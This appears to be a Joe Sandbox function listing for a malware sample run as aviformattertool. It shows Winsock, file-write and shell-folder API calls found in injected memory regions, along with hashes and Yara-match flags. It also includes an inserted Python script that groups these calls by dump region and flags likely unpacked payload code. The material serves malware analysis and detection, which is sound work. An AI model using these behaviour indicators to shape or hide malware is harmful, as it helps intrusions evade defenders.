Uniqueness Score: -1.00%

APIs
• InterlockedIncrement.KERNEL32(?), ref: 02A136A7
  • Part of subcall function 02A12420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A12432
  • Part of subcall function 02A12420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A12445
  • Part of subcall function 02A12420: RtlEnterCriticalSection.NTDLL(?), ref: 02A12454
  • Part of subcall function 02A12420: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12469
  • Part of subcall function 02A12420: RtlLeaveCriticalSection.NTDLL(?), ref: 02A12470
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
• String ID:
• API String ID: 1601054111-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• __beginthreadex.LIBCMT ref: 02A22086
• CloseHandle.KERNEL32(?,?,?,?,?,00000002,02A1A909,00000000), ref: 02A220B7
• ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02A1A909,00000000), ref: 02A220C5
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CloseHandleResumeThread__beginthreadex
• String ID:
• API String ID: 1685284544-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedIncrement.KERNEL32(02A472A0), ref: 02A11ABA
• WSAStartup.WS2_32(00000002,00000000), ref: 02A11ACB
• InterlockedExchange.KERNEL32(02A472A4,00000000), ref: 02A11AD7
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Interlocked$ExchangeIncrementStartup
• String ID:
• API String ID: 1856147945-0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseEventValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3274066644-0
                                                                                                                                                          • Opcode ID: acf0347921ab8584f88161ba136fec73ad30cd54a26e5e672ae73256d6149711
                                                                                                                                                          • Instruction ID: 9066e85729a21518be59a5119f1ca61cd5048985b4f02df55d579ce67435f41f
                                                                                                                                                          • Opcode Fuzzy Hash: acf0347921ab8584f88161ba136fec73ad30cd54a26e5e672ae73256d6149711
                                                                                                                                                          • Instruction Fuzzy Hash: A4D0E975844005FFDB055BE0EE4C96D7E79FB04305B154075E203704B5C7351961EB6E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A14C84
                                                                                                                                                            • Part of subcall function 02A11BA7: __EH_prolog.LIBCMT ref: 02A11BAC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11BBC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11BEA
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11C13
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11C56
                                                                                                                                                            • Part of subcall function 02A1E078: __EH_prolog.LIBCMT ref: 02A1E07D
                                                                                                                                                            • Part of subcall function 02A1E078: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A1E0FC
                                                                                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02A14D84
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1927618982-0
                                                                                                                                                          • Opcode ID: 4f66d06d54693330082d6041b5c165acff5e84af370103133789dcefa7c9fa46
                                                                                                                                                          • Instruction ID: 68eeef3bd33f1f0211f270d907ab0d9703407608d8fa659257a1bd93ff8443ca
                                                                                                                                                          • Opcode Fuzzy Hash: 4f66d06d54693330082d6041b5c165acff5e84af370103133789dcefa7c9fa46
                                                                                                                                                          • Instruction Fuzzy Hash: B9512871D042489FDF15DFA8C984AEEFBB5FF09324F14805AE905AB291DB709A04CF90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12D47
                                                                                                                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02A12D5C
                                                                                                                                                            • Part of subcall function 02A1A489: WSAGetLastError.WS2_32(00000000,?,?,02A12A51), ref: 02A1A497
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Send
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1282938840-0
                                                                                                                                                          • Opcode ID: fc9ce04735ef8d1e6c9919cc1573b9bb5ef370f01215668cf48fa1bfbc5c8c4d
                                                                                                                                                          • Instruction ID: f719d585d6ad92f63697cff415693bd5ed255d49db0e2b42f2144595b3fe5baf
                                                                                                                                                          • Opcode Fuzzy Hash: fc9ce04735ef8d1e6c9919cc1573b9bb5ef370f01215668cf48fa1bfbc5c8c4d
                                                                                                                                                          • Instruction Fuzzy Hash: 540121B5540229AFD7205FA9D98496BBBEDFB453A4B20492EF85993240EF70DD008B61
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A18387
                                                                                                                                                          • shutdown.WS2_32(?,00000002), ref: 02A18390
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastshutdown
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1920494066-0
                                                                                                                                                          • Opcode ID: d88c0b01c329883caf738b2c6bd20f8256bd1509824f40daadf008ced23daaf9
                                                                                                                                                          • Instruction ID: 11532e16095606e44f773929bb27bfc1fd0fdfde590ece7a399be600fcfaac2a
                                                                                                                                                          • Opcode Fuzzy Hash: d88c0b01c329883caf738b2c6bd20f8256bd1509824f40daadf008ced23daaf9
                                                                                                                                                          • Instruction Fuzzy Hash: ABF06DB56403298FD7109F58D905B5AB7E5BF08321F044858E96597380DB34A8008BA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                                                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2507506473-0
                                                                                                                                                          • Opcode ID: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction ID: 12b9d923cfd194162cf527058f048946e163d2adb3b2679e6a92d0a0525a53ee
                                                                                                                                                          • Opcode Fuzzy Hash: bd4a8705c2f058e6f61ee79851f8c15e955d8a701f491e7a2775f6fe6ed1aa1f
                                                                                                                                                          • Instruction Fuzzy Hash: BDF065709043015BEF205F316E4A7263EA89B50797F1448BFF501F82D1EB798B90A61A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A151B0
                                                                                                                                                            • Part of subcall function 02A13D7E: htons.WS2_32(?), ref: 02A13DA2
                                                                                                                                                            • Part of subcall function 02A13D7E: htonl.WS2_32(00000000), ref: 02A13DB9
                                                                                                                                                            • Part of subcall function 02A13D7E: htonl.WS2_32(00000000), ref: 02A13DC0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: htonl$H_prologhtons
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4039807196-0
                                                                                                                                                          • Opcode ID: 585a2d256c4e70823b8c4fc98be78b0dbd3f1448cfc6ccdb44475f7fc2820632
                                                                                                                                                          • Instruction ID: 71f7a5b4c36b5ed959bbe50cf012aae594a7d230b21c2b0097722111b50c37b2
                                                                                                                                                          • Opcode Fuzzy Hash: 585a2d256c4e70823b8c4fc98be78b0dbd3f1448cfc6ccdb44475f7fc2820632
                                                                                                                                                          • Instruction Fuzzy Hash: 8F813B75D0124E8ECF05DFA8D190AEEFBB5EF88324F14819AD850B7240EB759A05CFA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
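The listing attributes each recovered function to a memory dump. Every Winsock call so far (WSASend, WSASetLastError, shutdown, htons/htonl) sits in the 02A11000 dump, which is not backed by a PE on disk and carries Yara matches, while the PE-backed 00400000 dump only shows heap and runtime setup (HeapCreate, GetVersionExA, HeapDestroy, HeapAlloc). The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in this listing's layout (a constructed excerpt copied from the visible entries is embedded so it runs offline) and groups the APIs by dump offset, so that non-PE-backed regions containing network code stand out as candidates for the unpacked payload. The field names and the WS2_32 heuristic in suspicious_regions are this example's own choices, not Joe Sandbox terminology.

```python
"""Group Joe Sandbox function-listing entries by memory-dump source.

Added example for this report; not Joe Sandbox code.  SAMPLE is a
constructed excerpt copied from the visible function listing for adobe.exe
(analysis 1374165) so the script runs offline.
"""
import re
from collections import defaultdict

# Constructed sample in the report's own layout (three entries, two dump regions).
SAMPLE = """\
APIs
• WSASetLastError.WS2_32(00000000), ref: 02A12D47
• WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02A12D5C
  • Part of subcall function 02A1A489: WSAGetLastError.WS2_32(00000000,?,?,02A12A51), ref: 02A1A497
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
  • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
• HeapDestroy.KERNEL32 ref: 004032AA
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
APIs
• WSASetLastError.WS2_32(00000000), ref: 02A18387
• shutdown.WS2_32(?,00000002), ref: 02A18390
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Yara matches
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then Name.MODULE
# followed either by an argument list "(" or by " ref:" when no arguments were recovered.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"([A-Za-z_]\w*)\.([A-Za-z0-9_]+)(?:\(|\s+ref:)"
)
SRC_RE = re.compile(r"Offset:\s*([0-9A-F]+),\s*based on PE:\s*(true|false)")


def parse_entries(text):
    """Split the listing into entries; each starts at an 'APIs' line.

    Returns a list of dicts with keys apis (list of (name, module, direct)),
    offset (dump base as hex string), pe_backed (bool) and yara (bool).
    """
    entries, cur = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            cur = {"apis": [], "offset": None, "pe_backed": None, "yara": False}
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            direct = "Part of subcall" not in line
            cur["apis"].append((m.group(1), m.group(2), direct))
            continue
        m = SRC_RE.search(line)
        if m:
            cur["offset"] = m.group(1)
            cur["pe_backed"] = m.group(2) == "true"
            continue
        if stripped == "Yara matches":
            cur["yara"] = True
    return entries


def summarize(entries):
    """Aggregate per dump offset: function count, PE backing, Yara hit, modules and APIs."""
    regions = defaultdict(lambda: {"functions": 0, "pe_backed": None,
                                   "yara": False, "modules": set(), "apis": set()})
    for e in entries:
        r = regions[e["offset"]]
        r["functions"] += 1
        r["pe_backed"] = e["pe_backed"]
        r["yara"] = r["yara"] or e["yara"]
        for name, module, _direct in e["apis"]:
            r["modules"].add(module)
            r["apis"].add(name)
    return dict(regions)


def suspicious_regions(summary):
    """Heuristic chosen for this example: a region with no PE file behind it that
    imports WS2_32 is the first place to look for unpacked payload code."""
    return sorted(off for off, r in summary.items()
                  if r["pe_backed"] is False and "WS2_32" in r["modules"])


if __name__ == "__main__":
    summary = summarize(parse_entries(SAMPLE))
    for off, r in sorted(summary.items()):
        print(f"{off}: {r['functions']} functions, PE-backed={r['pe_backed']}, "
              f"yara={r['yara']}, modules={sorted(r['modules'])}")
    print("unpacked-code candidates:", suspicious_regions(summary))
```

Run against a full copy of this listing (pasted into SAMPLE or read from a file), the per-offset summary shows which dumps carry the Winsock, shell-folder and file-write code and which only carry loader runtime; the "Associated" and "Snapshot File" lines are ignored, and subcall lines are kept but flagged direct=False so a module imported only through a helper is still attributed to the region.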

                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNELBASE(0E23C226), ref: 02AAC06A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: b7db2c2ac1ebf4b557d7b054757339eb87fe76113f7320a8df8ba04dcb67e7b4
                                                                                                                                                          • Instruction ID: 548e9f7a37b913d1eccb6d394bebbee28579ba9529a9aedb404a9c02f01096d6
                                                                                                                                                          • Opcode Fuzzy Hash: b7db2c2ac1ebf4b557d7b054757339eb87fe76113f7320a8df8ba04dcb67e7b4
                                                                                                                                                          • Instruction Fuzzy Hash: 9251CDB250C6049FE7117E19DC857BABBE5EF94720F16492DDBC483740EA365800CADB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 02A53570
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FolderPathSpecial
                                                                                                                                                          • String ID:
• API String ID: 994120019-0
• Opcode ID: 0de91904f875396da940f63f84f80259b4f75a562933b93f10d5f0b9d7500b74
• Instruction ID: b05c20ce5de7ea8a7449b301654f6c690412c4d1bbc743f152ace5c7e8a23809
• Opcode Fuzzy Hash: 0de91904f875396da940f63f84f80259b4f75a562933b93f10d5f0b9d7500b74
• Instruction Fuzzy Hash: C321DFF250C604AFE715AE09DC81BBAFBE9EF98710F06482DE7C5C3750EA3595408A97
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1E946
  • Part of subcall function 02A11A01: TlsGetValue.KERNEL32 ref: 02A11A0A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prologValue
• String ID:
• API String ID: 3700342317-0
• Opcode ID: f2ba65603c1815a65e7883aba12c4b4b72a56d7f48ac62cde80eeb0e63e414cc
• Instruction ID: efb917875f7a6f18d6b10bb1f2432b7df899546cfd40c4a926cb1dd7b3165373
• Opcode Fuzzy Hash: f2ba65603c1815a65e7883aba12c4b4b72a56d7f48ac62cde80eeb0e63e414cc
• Instruction Fuzzy Hash: 63212FB2D04209AFDB04DFA4D640AFEFBF9EF48320F14452AE915E7240DB71A900CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 0bc2c6600c418b448beca4cffd0f036102c75a16f61f4e99a8c066ae26431e0b
• Instruction ID: 14dc635bf23f92f3e08999449be48497a198eab6eef5213938023c5798c99035
• Opcode Fuzzy Hash: 0bc2c6600c418b448beca4cffd0f036102c75a16f61f4e99a8c066ae26431e0b
• Instruction Fuzzy Hash: E22135F250C6009FE7057F19EC8667AFBE4EF48710F06092DE6D483740EA3559548A97
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(0E23C226), ref: 02AAC06A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: 5e7c3d362560834089696c6783bf291c3aad70a685fff77120f906b8794acb46
• Instruction ID: d27bc725ef4ab5fa15be7b071a3d23b453b931f750ce60e949ed156c733eb35b
• Opcode Fuzzy Hash: 5e7c3d362560834089696c6783bf291c3aad70a685fff77120f906b8794acb46
• Instruction Fuzzy Hash: F72118F251CA109FE7167F09D8857BAFBE5EF44710F06882DD6C443644EA3158448BDB
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A133CC
  • Part of subcall function 02A132AB: __EH_prolog.LIBCMT ref: 02A132B0
  • Part of subcall function 02A132AB: RtlEnterCriticalSection.NTDLL(?), ref: 02A132C3
  • Part of subcall function 02A132AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A132EF
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
• String ID:
• API String ID: 1518410164-0
• Opcode ID: d86364dee049d19d39da66d53fd91549b1020d7264834ba759d98fca12cd8a37
• Instruction ID: 2c78da396ff5b29a5ae0556ec214641cffd12c3ddce8ecd19401ff316f4004f0
• Opcode Fuzzy Hash: d86364dee049d19d39da66d53fd91549b1020d7264834ba759d98fca12cd8a37
• Instruction Fuzzy Hash: 43018070214606AFDB08DF59D886F55FBA9FF45330B10835AE828872C0EF30E821CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,00402E92,000000E0,00402E7F,?,00404853,00000100,?,00000000), ref: 00402F1A
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
• Instruction ID: 765fdeebac85905f4101f829938394dd68b44c118b6f92374405937e6060d87d
• Opcode Fuzzy Hash: 66789356bd00888105a6c91ff4dfb52d8ecebb81d0bee222744b9891a63f8538
• Instruction Fuzzy Hash: 08F0F43290422256EA20A714BF887C77364EB107B4F1A0537FE41BB2D0C3B8EC91A2CD
Uniqueness

Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(0E23C226), ref: 02AAC06A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: e49162da47c81d544e921baec42112d21d719c3d29f06b2d208218029d9b3b4d
• Instruction ID: 2a7d09d4cf723c53031b8b07ca49b78c4a7cae1579e0cc9925ff02089dd15919
• Opcode Fuzzy Hash: e49162da47c81d544e921baec42112d21d719c3d29f06b2d208218029d9b3b4d
• Instruction Fuzzy Hash: 2601D6F151CA009FE3067F19E8867BAFBE1EF94710F02882DE2C586A44DA344445CB9B
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1E4D6
  • Part of subcall function 02A126DB: RtlEnterCriticalSection.NTDLL(?), ref: 02A12706
  • Part of subcall function 02A126DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A1272B
  • Part of subcall function 02A126DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A35AD3), ref: 02A12738
  • Part of subcall function 02A126DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A12778
  • Part of subcall function 02A126DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02A127D9
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
• String ID:
• API String ID: 4293676635-0
• Opcode ID: c4b8c598c92b0edbf11c0d35cb929f56578ba083bee5c24db1190ab42bb75ab3
• Instruction ID: b82d937f6e322ba7613e49c8d87c9f43575e69ec97dfcbf6675536568bee63ee
• Opcode Fuzzy Hash: c4b8c598c92b0edbf11c0d35cb929f56578ba083bee5c24db1190ab42bb75ab3
• Instruction Fuzzy Hash: 7F01D0B5900B04DFC319CF1AC240986FBF4EF88310B01C5AEA4498B321EB70EA40CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE ref: 02AAC075
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: e6ecbe794ec6ca7fe2b5c9fda27a156c322041baea3b08f004f550512f756606
• Instruction ID: d80ca1c33a801c004810e36a0cff388fdd8424e6cfa8fa35780ea0ff522ad328
• Opcode Fuzzy Hash: e6ecbe794ec6ca7fe2b5c9fda27a156c322041baea3b08f004f550512f756606
• Instruction Fuzzy Hash: 88F012B204C204EFE3156A54EC86BFAF7E9EB19325F01091DE7D182540D73594008657
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02A1E2B5
  • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
  • Part of subcall function 02A1E4D1: __EH_prolog.LIBCMT ref: 02A1E4D6
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: H_prolog$_malloc
• String ID:
• API String ID: 4254904621-0
• Opcode ID: da89291ef7021c37cd7e282c3f2e491bfbac21c6afb979102bdf22e056934fba
• Instruction ID: 60da4e246801560c4210a593143c177ec36ca9502da19e7d100be5b9fc782f1d
• Opcode Fuzzy Hash: da89291ef7021c37cd7e282c3f2e491bfbac21c6afb979102bdf22e056934fba
• Instruction Fuzzy Hash: 3EE0C2B1E40209ABCF0DDF68DA1176EB7A6FB08300F0045BDBC09D2740DF7189008A04
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02A25BDA: __getptd_noexit.LIBCMT ref: 02A25BDB
  • Part of subcall function 02A25BDA: __amsg_exit.LIBCMT ref: 02A25BE8
  • Part of subcall function 02A23413: __getptd_noexit.LIBCMT ref: 02A23417
  • Part of subcall function 02A23413: __freeptd.LIBCMT ref: 02A23431
  • Part of subcall function 02A23413: RtlExitUserThread.NTDLL(?,00000000,?,02A233F3,00000000), ref: 02A2343A
• __XcptFilter.LIBCMT ref: 02A233FF
  • Part of subcall function 02A28D14: __getptd_noexit.LIBCMT ref: 02A28D18
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1405322794-0
                                                                                                                                                          • Opcode ID: 0170118c9d098eb9ed67f0ebb73d2c527628bc6cbdb97c9e347cf4b9dc343f56
                                                                                                                                                          • Instruction ID: db54fdf27b37439c996f0ee8817efef63e1fe1425c6186f1fab0cf8b3eb1c7bb
                                                                                                                                                          • Opcode Fuzzy Hash: 0170118c9d098eb9ed67f0ebb73d2c527628bc6cbdb97c9e347cf4b9dc343f56
                                                                                                                                                          • Instruction Fuzzy Hash: 1DE0E6B5D806119FEB08ABA4D905F2D7766EF45315F200088F1015B160DE7899449F30
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A4A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A4A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a4a000_aviformattertool.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 52c37f47e2b2ae63367bb402eec93a74e70dc70e372dca8dea6b66cdd5c339eb
